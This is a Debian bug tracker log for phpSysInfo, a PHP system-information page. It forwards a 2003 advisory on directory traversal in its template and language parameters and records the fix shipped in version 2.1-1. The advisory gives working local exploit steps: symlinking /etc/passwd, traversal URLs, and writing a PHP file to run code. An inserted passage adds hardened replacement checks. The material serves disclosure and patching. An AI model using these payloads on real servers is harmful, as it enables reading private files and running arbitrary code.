Debian Bug report logs - #200543
[ripe@7a69ezine.org: Unauthorized reading files on phpSysInfo]


Package: phpsysinfo; Maintainer for phpsysinfo is Bjoern Boschman <bjoern@boschman.de>; Source for phpsysinfo is src:phpsysinfo.

Reported by: Matt Zimmerman <mdz@debian.org>

Date: Wed, 9 Jul 2003 01:03:01 UTC

Severity: grave

Tags: security

Fixed in version phpsysinfo/2.1-1

Done: Frederik Schueler <fschueler@gmx.net>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>:
Bug#200543; Package phpsysinfo.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
New Bug report received and forwarded. Copy sent to Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>.

Message #5 received at submit@bugs.debian.org:

From: Matt Zimmerman <mdz@debian.org>
To: submit@bugs.debian.org
Subject: [ripe@7a69ezine.org: Unauthorized reading files on phpSysInfo]
Date: Tue, 8 Jul 2003 20:48:53 -0400
Package: phpsysinfo
Severity: grave
Tags: security

----- Forwarded message from Albert Puigsech Galicia <ripe@7a69ezine.org> -----

Date: Fri, 25 Apr 2003 08:22:23 +0100
From: Albert Puigsech Galicia <ripe@7a69ezine.org>
To: bugtraq@securityfocus.com
Subject: Unauthorized reading files on phpSysInfo

/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 007
|-----------------------------------------------------------------------------|
|
|              [ Unauthorized reading files on phpSysInfo ]
|
\-----------------------------------------------------------------------------/
                                                                | 01/04/2003 |


Data.
-----

        + Type:         To gain visibility.

        + Software:     phpSysInfo.

        + Versions:     until 2.1 (current version).

        + Exploit:      Yes (but only local).

        + Author:       Albert Puigsech Galicia

        + Contact:      ripe@7a69ezine.org



Information.
------------

        PhpSysInfo is a little PHP script intended to show system information.
It shows data like CPU or memory usage, disk usage, PCI, ethernet, and IDE
information, etc. Visit the project website at http://phpsysinfo.sourceforge.net
for more info.


Description.
------------

        PhpSysInfo uses a template system based on the 'template' variable, and a
language system based on the 'lng' variable. These variables are used to complete
a file path without checking whether they contain the special '..' directory,
allowing any file on the system to be read as the webserver user.


Exploiting.
-----------

        Exploiting this vulnerability requires write access to a local
directory where the webserver can read files.

        In the template case, phpSysInfo checks only whether the template
exists, and it does so only by checking whether 'templates/$template' exists.


---/ index.php /---

if (!((isset($template) && file_exists("templates/$template")) || $template == 'xml')) {
    // default template we should use if we don't get a argument.
    $template = 'classic';
}

---/ index.php /---


        Exactly the same applies to the language selection system.


---/ index.php /---

if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    $lng = 'en';
    // see if the browser knows the right languange.
    if(isset($HTTP_ACCEPT_LANGUAGE)) {
        $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
        if(count($plng) > 0) {
            while(list($k,$v) = each($plng)) {
                $k = split(';', $v, 1);
                $k = split('-', $k[0]);
                if(file_exists('./includes/lang/' . $k[0] . '.php')) {
                    $lng = $k[0];
                    break;
                }
            }
        }
    }
}

---/ index.php /---

        The 'template' variable will be used to open the files
'./templates/$template/form.tpl' and './templates/$template/box.tpl'
for the template, so it is necessary to create symlinks in order to read
any file readable by the webserver.


        local ~$ ln -s /etc/passwd /tmp/form.tpl
        local ~$ ln -s /etc/passwd /tmp/box.tpl

        http://vulnerable/index.php?template=../../../../tmp


        The 'lng' variable is used in this piece of code:

---/ index.php /---

require('./includes/lang/' . $lng . '.php');   // get our language include

---/ index.php /---


        It allows us, in the same way as 'template', to read a file on
the system.


        local ~$ ln -s /etc/passwd /tmp/p.php

        http://vulnerable/index.php?lng=../../../../tmp/p


        But it also allows arbitrary PHP code to be executed, by creating the
PHP file first.


        local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php

        http://vulnerable/index.php?lng=../../../../tmp/p


        The use of the PHP '.' operator to concatenate strings prevents a remote
exploit of this vulnerable PHP script, because we can't use %00 to end the string.


Patch.
------

        There is no official patch, but it is easy to code one by adding some
regex to the code to filter '..' content in the 'template' and 'lng' variables.



--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================

----- End forwarded message -----

-- 
 - mdz
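
Hardened replacements for the two checks quoted in the advisory above, as an added example that is neither phpSysInfo's own code nor the Debian fix: a positive allowlist on the names plus a realpath() containment check for the template directory, instead of the negative '..' filter the advisory proposes. It assumes the caller passes the raw request values ($_GET['template'], $_GET['lng'], the Accept-Language header) as arguments; the function names are hypothetical.

```php
<?php
// Added example, not phpSysInfo's own code: hardened replacements for the two
// file_exists()-only checks quoted in the advisory. Both functions take the raw
// request value as a parameter (assumption: the caller passes the $_GET values).

// Positive allowlist: a bare name, so '..', '/', '\' and NUL never reach the
// filesystem calls below. This replaces the negative '..' filter idea.
function is_plain_name(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name);
}

// Template: 'xml' is accepted as before; anything else must be a plain name
// whose directory resolves, via realpath() (which follows symlinks), to a
// location inside the templates directory.
function select_template(?string $template, string $base = 'templates'): string
{
    if ($template === 'xml') {
        return 'xml';
    }
    if ($template === null || !is_plain_name($template)) {
        return 'classic';
    }
    $realBase = realpath($base);
    $real = realpath($base . '/' . $template);
    if ($realBase === false || $real === false
        || strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return 'classic'; // missing, or a symlink that escapes the base directory
    }
    return $template;
}

// Language: the request value and the Accept-Language primary subtags are
// candidates only if they are plain names with an existing include file.
function select_language(?string $lng, string $accept = '', string $base = './includes/lang'): string
{
    $candidates = $lng === null ? [] : [$lng];
    foreach (explode(',', $accept) as $entry) {
        $tag = trim(explode(';', $entry, 2)[0]);      // drop ";q=0.8"
        if ($tag !== '') {
            $candidates[] = explode('-', $tag, 2)[0]; // "es-ES" -> "es"
        }
    }
    foreach ($candidates as $c) {
        if (is_plain_name($c) && is_file("$base/$c.php")) {
            return $c;
        }
    }
    return 'en';
}
```

With these checks the advisory's inputs '../../../../tmp' and '../../../../tmp/p' fail the name test and fall through to the 'classic' and 'en' defaults, and a template directory that is a symlink pointing outside templates/ is rejected by the realpath() comparison.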



Information forwarded to debian-bugs-dist@lists.debian.org, Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>:
Bug#200543; Package phpsysinfo.

Acknowledgement sent to Martin Michlmayr <tbm@cyrius.com>:
Extra info received and forwarded to list. Copy sent to Hereward Cooper (Hereward Matthew Lawrence Cooper) <zadok@phreaker.net>.

Message #10 received at 200543@bugs.debian.org:

From: Martin Michlmayr <tbm@cyrius.com>
To: 200543@bugs.debian.org
Subject: Fixed in stable, not in testing/unstable
Date: Sun, 12 Oct 2003 23:48:06 +1000
This has been fixed in stable due to DSA-346-1
(http://www.debian.org/security/2003/dsa-346), but testing/unstable
are still vulnerable.

-- 
Martin Michlmayr
tbm@cyrius.com



Reply sent to Frederik Schueler <fschueler@gmx.net>:
You have taken responsibility.

Notification sent to Matt Zimmerman <mdz@debian.org>:
Bug acknowledged by developer.

Message #15 received at 200543-close@bugs.debian.org:

From: Frederik Schueler <fschueler@gmx.net>
To: 200543-close@bugs.debian.org
Subject: Bug#200543: fixed in phpsysinfo 2.1-1
Date: Mon, 13 Oct 2003 07:47:34 -0400
Source: phpsysinfo
Source-Version: 2.1-1

We believe that the bug you reported is fixed in the latest version of
phpsysinfo, which is due to be installed in the Debian FTP archive:

phpsysinfo_2.1-1.diff.gz
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1.diff.gz
phpsysinfo_2.1-1.dsc
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1.dsc
phpsysinfo_2.1-1_all.deb
  to pool/main/p/phpsysinfo/phpsysinfo_2.1-1_all.deb
phpsysinfo_2.1.orig.tar.gz
  to pool/main/p/phpsysinfo/phpsysinfo_2.1.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 200543@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Frederik Schueler <fschueler@gmx.net> (supplier of updated phpsysinfo package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Sat, 27 Sep 2003 21:30:33 +0200
Source: phpsysinfo
Binary: phpsysinfo
Architecture: source all
Version: 2.1-1
Distribution: unstable
Urgency: low
Maintainer: Frederik Schueler <fschueler@gmx.net>
Changed-By: Frederik Schueler <fschueler@gmx.net>
Description: 
 phpsysinfo - PHP Based Host Information
Closes: 134896 163788 200543 211701
Changes: 
 phpsysinfo (2.1-1) unstable; urgency=low
 .
   * New maintainer, closes:  #211701
   * New upstream release
   * fixed template/lng parsing, closes: #200543
   * added alternative php4-cgi and php3-cgi dependency, closes: #163788
   * fixed package description, closes: #134896
   * bumped standards to 3.6.1
   * added patch for Linux 2.5/2.6 /proc/meminfo handling
Files: 
 a8039368ee52fd8912a0a35a316d1ac9 577 web optional phpsysinfo_2.1-1.dsc
 22d4d7977dfff237f8e0aa3e4ebaee75 104141 web optional phpsysinfo_2.1.orig.tar.gz
 966612f8eaa0675afcfcbf8e048f2bef 3601 web optional phpsysinfo_2.1-1.diff.gz
 83a709965f025b94e151453e1b0cd7a0 92612 web optional phpsysinfo_2.1-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/io/GlJsl7AdEclIRAlpXAJsHqx5WTF3869U575i0PSXbF0KR0wCfYnvy
LgdQBnQURFEV261kup+m9gA=
=1PVh
-----END PGP SIGNATURE-----






Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 11:19:37 2014; Machine Name: beach.debian.org
